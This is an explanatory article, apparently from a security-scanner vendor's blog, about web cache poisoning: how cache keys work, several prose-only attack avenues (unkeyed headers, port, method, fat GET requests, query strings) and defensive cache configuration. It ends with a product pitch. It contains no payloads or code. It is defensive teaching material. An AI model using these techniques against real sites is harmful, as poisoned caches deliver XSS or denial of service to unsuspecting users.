What is web caching?
Everyone is familiar with client-side caching by the browser, where content such as static images is temporarily saved in local storage for quicker loading on your next visit. The same idea applies at higher levels of the content delivery chain. Web servers, intermediate systems, and content delivery networks (CDNs) all use web caching to serve as many client requests as possible without having to retrieve the original content each time.
A modern site can use dozens of content sources, so without intermediate caching, ensuring tolerable and consistent load times would not be possible. Having a cache layer can also help with load balancing. The downside of widespread caching is the added complexity of maintaining multiple intermediate copies of content and keeping them all synchronized with the original. After all, improved performance and stability won’t do much good if clients can’t get the latest content because it isn’t reflected in the cache.
How cache keys work
To determine if something is already cached, caching servers keep an index of all the cached content and use cache keys to look up requests. A cache key is usually a simple string assembled from distinctive parts of a request, yielding a combination of header values (including the request line) that should be sufficient to distinguish between cached and uncached requests. Each caching mechanism will have its own way of building the cache key.
The parts of a request that are included in the cache key are called keyed inputs and the rest of the request are unkeyed inputs. All cache keys will include at least the path and host, but depending on the caching mechanism and application, other header values will also be used. Deliberately sending a modified request that definitely won’t be in the cache is called cache busting and is a crucial technique for investigating cache-related vulnerabilities and attacks. Using cache busting, penetration testers can experiment with cache poisoning without affecting other users.
What is web cache poisoning?
A relatively young technique, web cache poisoning uses a variety of methods to sneak modified (usually malicious) data into a web cache and have it returned to a client instead of legitimate cached content. Modifying cache content is not an attack in itself but merely a technique for delivering payloads, so web cache poisoning is as dangerous as the underlying vulnerability that is targeted – typically some form of cross-site scripting (XSS) or host header injection. While not easy to perform, it is also hard to detect and troubleshoot, making it a useful tool for attackers and an important point for penetration testing.
Here are the several ways of modifying caches that, depending on the caching mechanism, application, and browser, may allow web cache poisoning:
Reflected unkeyed headers
If the application directly reflects the value of a certain unkeyed header in the response, it opens an easy avenue to cache poisoning. Because the header is unkeyed, its value is not part of the cache key and plays no part in deciding about cache hits. If the attacker sends a request where only this header is maliciously modified, the response to this request will be cached, complete with the malicious payload (targeting, for example, a cross-site scripting vulnerability). Users subsequently requesting content that matches the same cache key will receive the malicious version from the cache.
Unkeyed port
If the port isn’t part of the cache key, it may be possible to perform a denial of service (DoS) attack by poisoning the cache with an inaccessible port number. If the attacker sends a request that includes such a port number and the error response is cached, users requesting the same URL without the port will immediately get the cached error instead of the expected page content. This will render the page inaccessible to users, in effect performing a subtle DoS attack only for a specific URL.
Unkeyed request method
Sometimes, the HTTP request method (GET
, POST
, PUT
, etc.) might not be part of the cache key. If the application is also vulnerable to parameter pollution, it may be possible to send a POST request containing a malicious payload that modifies a parameter, again typically to perform XSS. The poisoned response will then be cached and (because the cache key doesn’t account for the HTTP method) delivered to clients that send a normal GET request matching the same cache key.
Fat GET requests
If an application accepts non-standard GET
requests that have a body (so-called fat GET
requests) and the request body is both unkeyed and reflected in the response, this can present another avenue for cache poisoning. An attacker might then include a malicious payload in the GET
request, the response will be cached (because the request body is not part of the key) and users sending a regular GET
request that matches the same cache key will receive the poisoned response. In some cases, it may also be possible to use the X-HTTP-Method-Override
header to trick the application into treating a fat GET
request as a normal POST
request.
Unkeyed query string
Finally, if the query string of a request is unkeyed and reflected in the response, it may be possible to inject a malicious payload into a query parameter and cache the response. Clients sending a matching request with no query string would then receive the poisoned response. Because the attack is a typical script injection, you could say this method is a way of turning reflected XSS into stored XSS, with the script stored in the web cache. While this technique is easy to spot if used directly, it may evade detection in more complex scenarios.
Preventing web cache poisoning
Web cache poisoning is one of those devious techniques that piggyback on vital web infrastructure. More often than not, disabling web caching is not an option, either for performance reasons or simply because it is too deeply embedded in underlying platforms. Because cache poisoning relies on cache key confusion, it is relatively easy to configure the caching engine to generate cache keys that will thwart at least basic poisoning attempts. In fact, some standalone caching servers (notably Varnish) enable many of these safeguards by default.
To minimize the risk of web cache poisoning, your web cache server configuration should incorporate at least the following practices:
- Normalize the
Host
header: If your application only uses default ports, strip the port number from theHost
header before generating the cache key. This eliminates the risk of poisoning via an unkeyed port value, which can lead to DoS. - Only cache
GET
andHEAD
requests: This reduces the risk of poisoning via an unkeyed request method.POST
and other HTTP commands are designed to trigger an operation on the server, so in this case there is no performance benefit to caching responses anyway (because state-changing requests are often unique). - Don’t allow fat
GET
requests: Using non-standardGET
requests with a body is a dubious practice that can lead to cache poisoning among other security headaches. Caching servers should reject such requests and, wherever possible, applications shouldn’t send them in the first place. - (Optional) Disable caching headers: While preparing to perform cache poisoning, attackers need to check what kind of caching is used and detect web cache hits and misses. Eliminating caching-specific headers can make their job more difficult (though not impossible) and may be part of a defense-in-depth strategy. Note, however, that disabling these headers might negatively affect client-side caching in the browser.
The importance of fixing client-side vulnerabilities
Again, the crucial point about protecting yourself from attacks delivered through web cache poisoning is to find, fix, and avoid vulnerabilities that attackers may target. Cache poisoning is merely another vehicle for malicious actors to deliver their payloads. Even if you are hit by a cache poisoning attempt that injects an XSS payload into the cache, it will be harmless if your application is not vulnerable to that type of cross-site scripting.
By following secure coding practices and using a modern vulnerability scanner at every stage of your development and operations pipeline, you can make sure that you are finding and fixing vulnerabilities before they can make it into production. Netsparker in particular was designed with integration and automation in mind, making it possible to build a reliable DevSecOps process at even the largest scale. Ultimately, building more secure software will protect you and your clients from the consequences of web cache poisoning much better than even the best caching server setup.